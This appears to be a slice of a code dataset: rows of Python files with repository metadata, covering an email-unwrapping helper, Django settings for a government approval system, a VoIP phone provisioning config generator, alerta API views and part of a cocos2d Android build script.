(False, _html.render_html_tree(end_tree)),
]
def unwrap(text):
"""
If the passed text is the text body of a forwarded message, a reply, or
contains quoted text, a dictionary with the following keys is returned:
- type: "reply", "forward" or "quote"
- text_top: Text at the top of the passed message (if found)
- text_bottom: Text at the bottom of the passed message (if found)
- from / to / subject / cc / bcc / reply-to: Corresponding header of the
forwarded message, if it exists. (if found)
- text: Unindented text of the wrapped message (if found)
Otherwise, this function returns None.
"""
lines = text.split('\n')
result = _internal.unwrap(lines, _patterns.MAX_WRAP_LINES,
_patterns.MIN_HEADER_LINES,_patterns.MIN_QUOTED_LINES)
if result:
typ, top_range, hdrs, main_range, bottom_range, needs_unindent = result
text_top = lines[slice(*top_range)] if top_range else ''
text = lines[slice(*main_range)] if main_range else ''
text_bottom = lines[slice(*bottom_range)] if bottom_range else ''
if needs_unindent:
text = _internal.unindent_lines(text)
result = {
'type': typ,
}
text = '\n'.join(text).strip()
text_top = '\n'.join(text_top).strip()
text_bottom = '\n'.join(text_bottom).strip()
if text:
result['text'] = text
if text_top:
result['text_top'] = text_top
if text_bottom:
result['text_bottom'] = text_bottom
if hdrs:
result.update(hdrs)
return result
def unwrap_html(html):
"""
If the passed HTML is the HTML body of a forwarded message, a dictionary
with the following keys is returned:
- type: "reply", "forward" or "quote"
- html_top: HTML at the top of the passed message (if found)
- html_bottom: HTML at the bottom of the passed message (if found)
- from / to / subject / cc / bcc / reply-to: Corresponding header of the
forwarded message, if it exists. (if found)
- html: HTML of the forwarded message (if found)
Otherwise, this function returns None.
"""
from . import _html
tree = _html.get_html_tree(html)
start_refs, end_refs, lines = _html.get_line_info(tree)
result = _internal.unwrap(lines, 1, _patterns.MIN_HEADER_LINES, 1)
if result:
typ, top_range, hdrs, main_range, bottom_range, needs_unindent = result
result = {
'type': typ,
}
top_range = _html.trim_slice(lines, top_range)
main_range = _html.trim_slice(lines, main_range)
bottom_range = _html.trim_slice(lines, bottom_range)
if top_range:
top_tree = _html.slice_tree(tree, start_refs, end_refs, top_range,
html_copy=html)
html_top = _html.render_html_tree(top_tree)
if html_top:
result['html_top'] = html_top
if bottom_range:
bottom_tree = _html.slice_tree(tree, start_refs, end_refs,
bottom_range, html_copy=html)
html_bottom = _html.render_html_tree(bottom_tree)
if html_bottom:
result['html_bottom'] = html_bottom
if main_range:
main_tree = _html.slice_tree(tree, start_refs, end_refs, main_range)
if needs_unindent:
_html.unindent_tree(main_tree)
html = _html.render_html_tree(main_tree)
if html:
result['html'] = html
if hdrs:
result.update(hdrs)
return result
| 0 | 0 | 0 |
6a4c6a5ead1b8e02e2e5f40e25c2514b6405df58 | 7,876 | py | Python | disturbance/settings.py | thakurpriya1990/disturbance | 47f9ce5ae5f1b02d97ace11f1041e96daf7e4556 | [
"Apache-2.0"
] | 1 | 2020-06-30T04:47:42.000Z | 2020-06-30T04:47:42.000Z | disturbance/settings.py | thakurpriya1990/disturbance | 47f9ce5ae5f1b02d97ace11f1041e96daf7e4556 | [
"Apache-2.0"
] | 3 | 2021-05-12T00:05:54.000Z | 2022-03-02T10:37:22.000Z | disturbance/settings.py | thakurpriya1990/disturbance | 47f9ce5ae5f1b02d97ace11f1041e96daf7e4556 | [
"Apache-2.0"
] | 1 | 2020-06-16T05:51:52.000Z | 2020-06-16T05:51:52.000Z | from django.core.exceptions import ImproperlyConfigured
import os, hashlib
import confy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
confy.read_environment_file(BASE_DIR+"/.env")
os.environ.setdefault("BASE_DIR", BASE_DIR)
from ledger.settings_base import *
ROOT_URLCONF = 'disturbance.urls'
SITE_ID = 1
DEPT_DOMAINS = env('DEPT_DOMAINS', ['dpaw.wa.gov.au', 'dbca.wa.gov.au'])
SUPERVISOR_STOP_CMD = env('SUPERVISOR_STOP_CMD')
SYSTEM_MAINTENANCE_WARNING = env('SYSTEM_MAINTENANCE_WARNING', 24) # hours
DISABLE_EMAIL = env('DISABLE_EMAIL', False)
MEDIA_APP_DIR = env('MEDIA_APP_DIR', 'das')
MEDIA_APIARY_DIR = env('MEDIA_APIARY_DIR', 'apiary')
SPATIAL_DATA_DIR = env('SPATIAL_DATA_DIR', 'spatial_data')
ANNUAL_RENTAL_FEE_GST_EXEMPT = True
INSTALLED_APPS += [
'reversion_compare',
'bootstrap3',
'disturbance',
'disturbance.components.main',
'disturbance.components.organisations',
'disturbance.components.users',
'disturbance.components.proposals',
'disturbance.components.approvals',
'disturbance.components.compliances',
'disturbance.components.das_payments',
'taggit',
'rest_framework',
'rest_framework_datatables',
'rest_framework_gis',
'reset_migrations',
'ckeditor',
'smart_selects',
]
ADD_REVERSION_ADMIN=True
# maximum number of days allowed for a booking
WSGI_APPLICATION = 'disturbance.wsgi.application'
'''REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'disturbance.perms.OfficerPermission',
)
}'''
#REST_FRAMEWORK = {
# 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
# #'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
# 'PAGE_SIZE': 5
#}
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
'rest_framework_datatables.renderers.DatatablesRenderer',
),
#'DEFAULT_FILTER_BACKENDS': (
# 'rest_framework_datatables.filters.DatatablesFilterBackend',
#),
#'DEFAULT_PAGINATION_CLASS': 'rest_framework_datatables.pagination.DatatablesPageNumberPagination',
#'PAGE_SIZE': 20,
}
USE_DJANGO_JQUERY= True
# JQUERY_URL = True
MIDDLEWARE_CLASSES += [
'disturbance.middleware.BookingTimerMiddleware',
'disturbance.middleware.FirstTimeNagScreenMiddleware',
'disturbance.middleware.RevisionOverrideMiddleware',
'disturbance.middleware.DomainDetectMiddleware',
]
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance', 'templates'))
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance','components','organisations', 'templates'))
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance','components','emails', 'templates'))
TEMPLATES[0]['OPTIONS']['context_processors'].append('disturbance.context_processors.apiary_url')
del BOOTSTRAP3['css_url']
#BOOTSTRAP3 = {
# 'jquery_url': '//static.dpaw.wa.gov.au/static/libs/jquery/2.2.1/jquery.min.js',
# 'base_url': '//static.dpaw.wa.gov.au/static/libs/twitter-bootstrap/3.3.6/',
# 'css_url': None,
# 'theme_url': None,
# 'javascript_url': None,
# 'javascript_in_head': False,
# 'include_jquery': False,
# 'required_css_class': 'required-form-field',
# 'set_placeholder': False,
#}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(BASE_DIR, 'disturbance', 'cache'),
}
}
STATIC_ROOT=os.path.join(BASE_DIR, 'staticfiles_ds')
STATICFILES_DIRS.append(os.path.join(os.path.join(BASE_DIR, 'disturbance', 'static')))
DEV_STATIC = env('DEV_STATIC',False)
DEV_STATIC_URL = env('DEV_STATIC_URL')
if DEV_STATIC and not DEV_STATIC_URL:
raise ImproperlyConfigured('If running in DEV_STATIC, DEV_STATIC_URL has to be set')
DATA_UPLOAD_MAX_NUMBER_FIELDS = None
# Department details
SYSTEM_NAME = env('SYSTEM_NAME', 'Disturbance Approval System')
APIARY_SYSTEM_NAME = env('APIARY_SYSTEM_NAME', 'Apiary System')
SYSTEM_NAME_SHORT = env('SYSTEM_NAME_SHORT', 'DAS')
SITE_PREFIX = env('SITE_PREFIX')
SITE_DOMAIN = env('SITE_DOMAIN')
SUPPORT_EMAIL = env('SUPPORT_EMAIL', SYSTEM_NAME_SHORT.lower() + '@' + SITE_DOMAIN).lower()
APIARY_SUPPORT_EMAIL = env('APIARY_SUPPORT_EMAIL', SUPPORT_EMAIL).lower()
DEP_URL = env('DEP_URL','www.' + SITE_DOMAIN)
DEP_PHONE = env('DEP_PHONE','(08) 9219 9000')
DEP_PHONE_SUPPORT = env('DEP_PHONE_SUPPORT','(08) 9219 9000')
DEP_FAX = env('DEP_FAX','(08) 9423 8242')
DEP_POSTAL = env('DEP_POSTAL','Locked Bag 104, Bentley Delivery Centre, Western Australia 6983')
DEP_NAME = env('DEP_NAME','Department of Biodiversity, Conservation and Attractions')
DEP_NAME_SHORT = env('DEP_NAME_SHORT','DBCA')
SITE_URL = env('SITE_URL', 'https://' + '.'.join([SITE_PREFIX, SITE_DOMAIN]).strip('.'))
PUBLIC_URL=env('PUBLIC_URL', SITE_URL)
EMAIL_FROM = env('EMAIL_FROM', 'no-reply@' + SITE_DOMAIN).lower()
DEFAULT_FROM_EMAIL = env('DEFAULT_FROM_EMAIL', 'no-reply@' + SITE_DOMAIN).lower()
ADMIN_GROUP = env('ADMIN_GROUP', 'Disturbance Admin')
APIARY_ADMIN_GROUP = 'Apiary Admin'
DAS_APIARY_ADMIN_GROUP = 'DAS-Apiary Admin'
APIARY_PAYMENTS_OFFICERS_GROUP = 'Apiary Payments Officers'
APPROVED_EXTERNAL_USERS_GROUP = env('APPROVED_EXTERNAL_USERS_GROUP', 'Disturbance Approved External Users')
CRON_EMAIL = env('CRON_EMAIL', 'cron@' + SITE_DOMAIN).lower()
TENURE_SECTION = env('TENURE_SECTION', None)
ASSESSMENT_REMINDER_DAYS = env('ASSESSMENT_REMINDER_DAYS', 15)
OSCAR_BASKET_COOKIE_OPEN = 'das_basket'
PAYMENT_SYSTEM_ID = env('PAYMENT_SYSTEM_ID', 'S517')
PS_PAYMENT_SYSTEM_ID = PAYMENT_SYSTEM_ID
PAYMENT_SYSTEM_PREFIX = env('PAYMENT_SYSTEM_PREFIX', PAYMENT_SYSTEM_ID.replace('S','0')) # '0517'
os.environ['LEDGER_PRODUCT_CUSTOM_FIELDS'] = "('ledger_description','quantity','price_incl_tax','price_excl_tax','oracle_code')"
APIARY_URL = env('APIARY_URL', [])
CRON_NOTIFICATION_EMAIL = env('CRON_NOTIFICATION_EMAIL', NOTIFICATION_EMAIL).lower()
BASE_URL=env('BASE_URL')
CKEDITOR_CONFIGS = {
'default': {
'toolbar': 'full',
'height': 300,
#'width': 300,
'width': '100%',
},
'awesome_ckeditor': {
'toolbar': 'Basic',
},
}
BUILD_TAG = env('BUILD_TAG', hashlib.md5(os.urandom(32)).hexdigest()) # URL of the Dev app.js served by webpack & express
DEV_APP_BUILD_URL = env('DEV_APP_BUILD_URL') # URL of the Dev app.js served by webpack & express
GEOCODING_ADDRESS_SEARCH_TOKEN = env('GEOCODING_ADDRESS_SEARCH_TOKEN', 'ACCESS_TOKEN_NOT_FOUND')
RESTRICTED_RADIUS = 3000 # unit: [m]
DBCA_ABN = '38 052 249 024'
if env('CONSOLE_EMAIL_BACKEND', False):
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
SITE_STATUS_DRAFT = 'draft'
SITE_STATUS_PENDING = 'pending'
SITE_STATUS_APPROVED = 'approved'
SITE_STATUS_DENIED = 'denied'
SITE_STATUS_CURRENT = 'current'
SITE_STATUS_NOT_TO_BE_REISSUED = 'not_to_be_reissued'
SITE_STATUS_SUSPENDED = 'suspended'
SITE_STATUS_TRANSFERRED = 'transferred'
SITE_STATUS_VACANT = 'vacant'
SITE_STATUS_DISCARDED = 'discarded'
BASE_EMAIL_TEXT = ''
BASE_EMAIL_HTML = ''
# This is either 'das'/'apiary'
# default: 'das'
# This value is determined at the middleware, DomainDetectMiddleware by where the request comes from
DOMAIN_DETECTED = 'das'
HTTP_HOST_FOR_TEST = 'localhost:8071'
# Additional logging for commercialoperator
LOGGING['loggers']['disturbance'] = {
'handlers': ['file'],
'level': 'INFO'
}
#APPLICATION_TYPES_SQL='''
# SELECT name, name FROM disturbance_applicationtypechoice
# WHERE archive_date IS NULL OR archive_date > now()
# '''
#from django.db import connection
#def run_select_sql(sql):
# try:
# with connection.cursor() as cursor:
# cursor.execute(sql)
# row = cursor.fetchall()
# return row
# except:
# return []
| 36.462963 | 128 | 0.734002 | from django.core.exceptions import ImproperlyConfigured
import os, hashlib
import confy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
confy.read_environment_file(BASE_DIR+"/.env")
os.environ.setdefault("BASE_DIR", BASE_DIR)
from ledger.settings_base import *
ROOT_URLCONF = 'disturbance.urls'
SITE_ID = 1
DEPT_DOMAINS = env('DEPT_DOMAINS', ['dpaw.wa.gov.au', 'dbca.wa.gov.au'])
SUPERVISOR_STOP_CMD = env('SUPERVISOR_STOP_CMD')
SYSTEM_MAINTENANCE_WARNING = env('SYSTEM_MAINTENANCE_WARNING', 24) # hours
DISABLE_EMAIL = env('DISABLE_EMAIL', False)
MEDIA_APP_DIR = env('MEDIA_APP_DIR', 'das')
MEDIA_APIARY_DIR = env('MEDIA_APIARY_DIR', 'apiary')
SPATIAL_DATA_DIR = env('SPATIAL_DATA_DIR', 'spatial_data')
ANNUAL_RENTAL_FEE_GST_EXEMPT = True
INSTALLED_APPS += [
'reversion_compare',
'bootstrap3',
'disturbance',
'disturbance.components.main',
'disturbance.components.organisations',
'disturbance.components.users',
'disturbance.components.proposals',
'disturbance.components.approvals',
'disturbance.components.compliances',
'disturbance.components.das_payments',
'taggit',
'rest_framework',
'rest_framework_datatables',
'rest_framework_gis',
'reset_migrations',
'ckeditor',
'smart_selects',
]
ADD_REVERSION_ADMIN=True
# maximum number of days allowed for a booking
WSGI_APPLICATION = 'disturbance.wsgi.application'
'''REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'disturbance.perms.OfficerPermission',
)
}'''
#REST_FRAMEWORK = {
# 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
# #'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
# 'PAGE_SIZE': 5
#}
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
'rest_framework_datatables.renderers.DatatablesRenderer',
),
#'DEFAULT_FILTER_BACKENDS': (
# 'rest_framework_datatables.filters.DatatablesFilterBackend',
#),
#'DEFAULT_PAGINATION_CLASS': 'rest_framework_datatables.pagination.DatatablesPageNumberPagination',
#'PAGE_SIZE': 20,
}
USE_DJANGO_JQUERY= True
# JQUERY_URL = True
MIDDLEWARE_CLASSES += [
'disturbance.middleware.BookingTimerMiddleware',
'disturbance.middleware.FirstTimeNagScreenMiddleware',
'disturbance.middleware.RevisionOverrideMiddleware',
'disturbance.middleware.DomainDetectMiddleware',
]
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance', 'templates'))
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance','components','organisations', 'templates'))
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance','components','emails', 'templates'))
TEMPLATES[0]['OPTIONS']['context_processors'].append('disturbance.context_processors.apiary_url')
del BOOTSTRAP3['css_url']
#BOOTSTRAP3 = {
# 'jquery_url': '//static.dpaw.wa.gov.au/static/libs/jquery/2.2.1/jquery.min.js',
# 'base_url': '//static.dpaw.wa.gov.au/static/libs/twitter-bootstrap/3.3.6/',
# 'css_url': None,
# 'theme_url': None,
# 'javascript_url': None,
# 'javascript_in_head': False,
# 'include_jquery': False,
# 'required_css_class': 'required-form-field',
# 'set_placeholder': False,
#}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(BASE_DIR, 'disturbance', 'cache'),
}
}
STATIC_ROOT=os.path.join(BASE_DIR, 'staticfiles_ds')
STATICFILES_DIRS.append(os.path.join(os.path.join(BASE_DIR, 'disturbance', 'static')))
DEV_STATIC = env('DEV_STATIC',False)
DEV_STATIC_URL = env('DEV_STATIC_URL')
if DEV_STATIC and not DEV_STATIC_URL:
raise ImproperlyConfigured('If running in DEV_STATIC, DEV_STATIC_URL has to be set')
DATA_UPLOAD_MAX_NUMBER_FIELDS = None
# Department details
SYSTEM_NAME = env('SYSTEM_NAME', 'Disturbance Approval System')
APIARY_SYSTEM_NAME = env('APIARY_SYSTEM_NAME', 'Apiary System')
SYSTEM_NAME_SHORT = env('SYSTEM_NAME_SHORT', 'DAS')
SITE_PREFIX = env('SITE_PREFIX')
SITE_DOMAIN = env('SITE_DOMAIN')
SUPPORT_EMAIL = env('SUPPORT_EMAIL', SYSTEM_NAME_SHORT.lower() + '@' + SITE_DOMAIN).lower()
APIARY_SUPPORT_EMAIL = env('APIARY_SUPPORT_EMAIL', SUPPORT_EMAIL).lower()
DEP_URL = env('DEP_URL','www.' + SITE_DOMAIN)
DEP_PHONE = env('DEP_PHONE','(08) 9219 9000')
DEP_PHONE_SUPPORT = env('DEP_PHONE_SUPPORT','(08) 9219 9000')
DEP_FAX = env('DEP_FAX','(08) 9423 8242')
DEP_POSTAL = env('DEP_POSTAL','Locked Bag 104, Bentley Delivery Centre, Western Australia 6983')
DEP_NAME = env('DEP_NAME','Department of Biodiversity, Conservation and Attractions')
DEP_NAME_SHORT = env('DEP_NAME_SHORT','DBCA')
SITE_URL = env('SITE_URL', 'https://' + '.'.join([SITE_PREFIX, SITE_DOMAIN]).strip('.'))
PUBLIC_URL=env('PUBLIC_URL', SITE_URL)
EMAIL_FROM = env('EMAIL_FROM', 'no-reply@' + SITE_DOMAIN).lower()
DEFAULT_FROM_EMAIL = env('DEFAULT_FROM_EMAIL', 'no-reply@' + SITE_DOMAIN).lower()
ADMIN_GROUP = env('ADMIN_GROUP', 'Disturbance Admin')
APIARY_ADMIN_GROUP = 'Apiary Admin'
DAS_APIARY_ADMIN_GROUP = 'DAS-Apiary Admin'
APIARY_PAYMENTS_OFFICERS_GROUP = 'Apiary Payments Officers'
APPROVED_EXTERNAL_USERS_GROUP = env('APPROVED_EXTERNAL_USERS_GROUP', 'Disturbance Approved External Users')
CRON_EMAIL = env('CRON_EMAIL', 'cron@' + SITE_DOMAIN).lower()
TENURE_SECTION = env('TENURE_SECTION', None)
ASSESSMENT_REMINDER_DAYS = env('ASSESSMENT_REMINDER_DAYS', 15)
OSCAR_BASKET_COOKIE_OPEN = 'das_basket'
PAYMENT_SYSTEM_ID = env('PAYMENT_SYSTEM_ID', 'S517')
PS_PAYMENT_SYSTEM_ID = PAYMENT_SYSTEM_ID
PAYMENT_SYSTEM_PREFIX = env('PAYMENT_SYSTEM_PREFIX', PAYMENT_SYSTEM_ID.replace('S','0')) # '0517'
os.environ['LEDGER_PRODUCT_CUSTOM_FIELDS'] = "('ledger_description','quantity','price_incl_tax','price_excl_tax','oracle_code')"
APIARY_URL = env('APIARY_URL', [])
CRON_NOTIFICATION_EMAIL = env('CRON_NOTIFICATION_EMAIL', NOTIFICATION_EMAIL).lower()
BASE_URL=env('BASE_URL')
CKEDITOR_CONFIGS = {
'default': {
'toolbar': 'full',
'height': 300,
#'width': 300,
'width': '100%',
},
'awesome_ckeditor': {
'toolbar': 'Basic',
},
}
BUILD_TAG = env('BUILD_TAG', hashlib.md5(os.urandom(32)).hexdigest()) # URL of the Dev app.js served by webpack & express
DEV_APP_BUILD_URL = env('DEV_APP_BUILD_URL') # URL of the Dev app.js served by webpack & express
GEOCODING_ADDRESS_SEARCH_TOKEN = env('GEOCODING_ADDRESS_SEARCH_TOKEN', 'ACCESS_TOKEN_NOT_FOUND')
RESTRICTED_RADIUS = 3000 # unit: [m]
DBCA_ABN = '38 052 249 024'
if env('CONSOLE_EMAIL_BACKEND', False):
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
SITE_STATUS_DRAFT = 'draft'
SITE_STATUS_PENDING = 'pending'
SITE_STATUS_APPROVED = 'approved'
SITE_STATUS_DENIED = 'denied'
SITE_STATUS_CURRENT = 'current'
SITE_STATUS_NOT_TO_BE_REISSUED = 'not_to_be_reissued'
SITE_STATUS_SUSPENDED = 'suspended'
SITE_STATUS_TRANSFERRED = 'transferred'
SITE_STATUS_VACANT = 'vacant'
SITE_STATUS_DISCARDED = 'discarded'
BASE_EMAIL_TEXT = ''
BASE_EMAIL_HTML = ''
# This is either 'das'/'apiary'
# default: 'das'
# This value is determined at the middleware, DomainDetectMiddleware by where the request comes from
DOMAIN_DETECTED = 'das'
HTTP_HOST_FOR_TEST = 'localhost:8071'
# Additional logging for commercialoperator
LOGGING['loggers']['disturbance'] = {
'handlers': ['file'],
'level': 'INFO'
}
#APPLICATION_TYPES_SQL='''
# SELECT name, name FROM disturbance_applicationtypechoice
# WHERE archive_date IS NULL OR archive_date > now()
# '''
#from django.db import connection
#def run_select_sql(sql):
# try:
# with connection.cursor() as cursor:
# cursor.execute(sql)
# row = cursor.fetchall()
# return row
# except:
# return []
| 0 | 0 | 0 |
f924ae02089b8d9b8047385bafaca4369a73ed8a | 99 | py | Python | django_auth/p_library/apps.py | bobruk76/D7 | f5167ac40d093d49a89c36b3465e5073e6530ed1 | [
"MIT"
] | null | null | null | django_auth/p_library/apps.py | bobruk76/D7 | f5167ac40d093d49a89c36b3465e5073e6530ed1 | [
"MIT"
] | 7 | 2021-04-08T21:29:04.000Z | 2022-01-13T03:05:35.000Z | django_auth/p_library/apps.py | bobruk76/D7 | f5167ac40d093d49a89c36b3465e5073e6530ed1 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 16.5 | 35 | 0.727273 | from django.apps import AppConfig
class OrmExampleConfig(AppConfig):
name = 'p_library'
| 0 | 37 | 25 |
871940d70a528cc5f3e9d07b3130d476a0ac2b28 | 1,928 | py | Python | provision/cg.py | mkosterin/snr_phones_autoprovision_config_generator | c21cf91fcebd5f17a59cf5f30faf2d0ca7fffcc3 | [
"MIT"
] | null | null | null | provision/cg.py | mkosterin/snr_phones_autoprovision_config_generator | c21cf91fcebd5f17a59cf5f30faf2d0ca7fffcc3 | [
"MIT"
] | null | null | null | provision/cg.py | mkosterin/snr_phones_autoprovision_config_generator | c21cf91fcebd5f17a59cf5f30faf2d0ca7fffcc3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import string
import random
from jinja2 import Template, Environment, FileSystemLoader
baseDir = "c:\\provision"
# which extension number we should start
start_ext = 821
extensionHeader = """#cid_number,transfer,mailbox,type,qualify,hasdirectory,call-limit,host,context,fullname,secret,hasvoicemail,vmsecret,email,delete,hassip,hasiax,dahdichan,hasmanager,nat,dtmfmode,hasagent,callwaiting,videosupport,transport,encryption,srtpcapable,disallow,allow,deny,permit,callgroup,pickupgroup"""
extensionFileName = baseDir + "\\" + "users_extensions.csv"
env = Environment(loader=FileSystemLoader(baseDir))
mac = open(baseDir + "\\" + "macs.txt")
extensionFile = open(extensionFileName, "w")
extensionFile.write(extensionHeader)
templateExtension = env.get_template("templ_extensions.csv.j2")
templateMac = env.get_template("templ.cfg.j2")
ext = start_ext
for line in mac:
data = {
"enable": "1",
"label": ext,
"displayname": ext,
"sipUsername": ext,
"authname": ext,
"sipPassword": password(),
"server": "192.168.1.1", #change it as you want
"webUser": "admin", #change it as you want
"webPassword": "admin" #change it as you want
}
extensionFile.write("\n" + templateExtension.render(**data))
autopFile = open(baseDir + "\\" + line[0:-1] + ".cfg", "w")
autopFile.write(templateMac.render(**data) + "\n")
autopFile.close()
ext = ext + 1
mac.close()
extensionFile.close()
| 32.677966 | 318 | 0.645747 | # -*- coding: utf-8 -*-
import string
import random
from jinja2 import Template, Environment, FileSystemLoader
def password():
alphabet = string.ascii_letters + string.digits
while True:
password = ''.join(random.choice(alphabet) for i in range(10))
if (any(c.islower() for c in password)
and any(c.isupper() for c in password)
and sum(c.isdigit() for c in password) >= 3):
break
return password
baseDir = "c:\\provision"
# which extension number we should start
start_ext = 821
extensionHeader = """#cid_number,transfer,mailbox,type,qualify,hasdirectory,call-limit,host,context,fullname,secret,hasvoicemail,vmsecret,email,delete,hassip,hasiax,dahdichan,hasmanager,nat,dtmfmode,hasagent,callwaiting,videosupport,transport,encryption,srtpcapable,disallow,allow,deny,permit,callgroup,pickupgroup"""
extensionFileName = baseDir + "\\" + "users_extensions.csv"
env = Environment(loader=FileSystemLoader(baseDir))
mac = open(baseDir + "\\" + "macs.txt")
extensionFile = open(extensionFileName, "w")
extensionFile.write(extensionHeader)
templateExtension = env.get_template("templ_extensions.csv.j2")
templateMac = env.get_template("templ.cfg.j2")
ext = start_ext
for line in mac:
data = {
"enable": "1",
"label": ext,
"displayname": ext,
"sipUsername": ext,
"authname": ext,
"sipPassword": password(),
"server": "192.168.1.1", #change it as you want
"webUser": "admin", #change it as you want
"webPassword": "admin" #change it as you want
}
extensionFile.write("\n" + templateExtension.render(**data))
autopFile = open(baseDir + "\\" + line[0:-1] + ".cfg", "w")
autopFile.write(templateMac.render(**data) + "\n")
autopFile.close()
ext = ext + 1
mac.close()
extensionFile.close()
| 343 | 0 | 25 |
044676a8ff601efa4be0c7cc2f74a9175441a1bb | 1,352 | py | Python | alerta/views/__init__.py | smbambling/alerta | 1b3c3888b67ac4db48ef5eb9dcd704ac0c5aecb1 | [
"Apache-2.0"
] | 1,233 | 2017-11-01T00:29:12.000Z | 2022-03-29T04:13:09.000Z | alerta/views/__init__.py | smbambling/alerta | 1b3c3888b67ac4db48ef5eb9dcd704ac0c5aecb1 | [
"Apache-2.0"
] | 760 | 2017-10-27T20:33:41.000Z | 2022-03-28T17:01:41.000Z | alerta/views/__init__.py | smbambling/alerta | 1b3c3888b67ac4db48ef5eb9dcd704ac0c5aecb1 | [
"Apache-2.0"
] | 238 | 2017-11-02T14:58:15.000Z | 2022-03-29T03:59:20.000Z | from flask import Blueprint, current_app, jsonify, request
from alerta.app import custom_webhooks
from alerta.exceptions import ApiError
from alerta.utils.response import absolute_url
api = Blueprint('api', __name__)
from . import alerts, blackouts, config, customers, groups, heartbeats, keys, oembed, permissions, users # noqa isort:skip
try:
from . import bulk # noqa
except ImportError:
pass
@api.before_request
@api.route('/', methods=['OPTIONS', 'GET'])
@api.route('/_', methods=['GET'])
| 28.765957 | 133 | 0.642012 | from flask import Blueprint, current_app, jsonify, request
from alerta.app import custom_webhooks
from alerta.exceptions import ApiError
from alerta.utils.response import absolute_url
api = Blueprint('api', __name__)
from . import alerts, blackouts, config, customers, groups, heartbeats, keys, oembed, permissions, users # noqa isort:skip
try:
from . import bulk # noqa
except ImportError:
pass
@api.before_request
def before_request():
if request.method in ['POST', 'PUT'] and not request.is_json:
raise ApiError("POST and PUT requests must set 'Content-type' to 'application/json'", 415)
@api.route('/', methods=['OPTIONS', 'GET'])
def index():
links = []
for rule in current_app.url_map.iter_rules():
links.append({
'rel': rule.endpoint,
'href': absolute_url(rule.rule),
'method': ','.join([m for m in rule.methods if m not in ['HEAD', 'OPTIONS']])
})
for rule in custom_webhooks.iter_rules():
links.append({
'rel': rule.endpoint,
'href': absolute_url(rule.rule),
'method': ','.join(rule.methods)
})
return jsonify(status='ok', uri=absolute_url(), data={'description': 'Alerta API'}, links=sorted(links, key=lambda k: k['href']))
@api.route('/_', methods=['GET'])
def debug():
return 'OK'
| 772 | 0 | 66 |
a3a6ca3d60b2fa60a87dfa7d07a083ca5ad28d60 | 19,506 | py | Python | tools/cocos2d-console/plugins/project_compile/build_android.py | kinzhang/cocos2d-js-v3.2 | 530c6fe1345aa31fbd94d0ec191071a6db23820d | [
"MIT"
] | null | null | null | tools/cocos2d-console/plugins/project_compile/build_android.py | kinzhang/cocos2d-js-v3.2 | 530c6fe1345aa31fbd94d0ec191071a6db23820d | [
"MIT"
] | null | null | null | tools/cocos2d-console/plugins/project_compile/build_android.py | kinzhang/cocos2d-js-v3.2 | 530c6fe1345aa31fbd94d0ec191071a6db23820d | [
"MIT"
] | null | null | null | #!/usr/bin/python
# build_native.py
# Build native codes
import sys
import os, os.path
import shutil
from optparse import OptionParser
import cocos
import cocos_project
import json
import re
from xml.dom import minidom
import project_compile
BUILD_CFIG_FILE="build-cfg.json"
| 39.889571 | 186 | 0.618886 | #!/usr/bin/python
# build_native.py
# Build native codes
import sys
import os, os.path
import shutil
from optparse import OptionParser
import cocos
import cocos_project
import json
import re
from xml.dom import minidom
import project_compile
BUILD_CFIG_FILE="build-cfg.json"
class AndroidBuilder(object):
CFG_KEY_COPY_TO_ASSETS = "copy_to_assets"
CFG_KEY_MUST_COPY_TO_ASSERTS = "must_copy_to_assets"
CFG_KEY_STORE = "key_store"
CFG_KEY_STORE_PASS = "key_store_pass"
CFG_KEY_ALIAS = "alias"
CFG_KEY_ALIAS_PASS = "alias_pass"
def __init__(self, verbose, app_android_root, no_res, proj_obj):
self._verbose = verbose
self.app_android_root = app_android_root
self._no_res = no_res
self._project = proj_obj
self.ant_cfg_file = os.path.join(self.app_android_root, "ant.properties")
self._parse_cfg()
def _run_cmd(self, command):
cocos.CMDRunner.run_cmd(command, self._verbose)
def _parse_cfg(self):
self.cfg_path = os.path.join(self.app_android_root, BUILD_CFIG_FILE)
try:
f = open(self.cfg_path)
cfg = json.load(f, encoding='utf8')
f.close()
except Exception:
raise cocos.CCPluginError("Configuration file \"%s\" is not existed or broken!" % self.cfg_path)
if cfg.has_key(project_compile.CCPluginCompile.CFG_KEY_MUST_COPY_RESOURCES):
if self._no_res:
self.res_files = cfg[project_compile.CCPluginCompile.CFG_KEY_MUST_COPY_RESOURCES]
else:
self.res_files = cfg[project_compile.CCPluginCompile.CFG_KEY_MUST_COPY_RESOURCES] + cfg[project_compile.CCPluginCompile.CFG_KEY_COPY_RESOURCES]
else:
self.res_files = cfg[project_compile.CCPluginCompile.CFG_KEY_COPY_RESOURCES]
self.ndk_module_paths = cfg['ndk_module_path']
# get the properties for sign release apk
move_cfg = {}
self.key_store = None
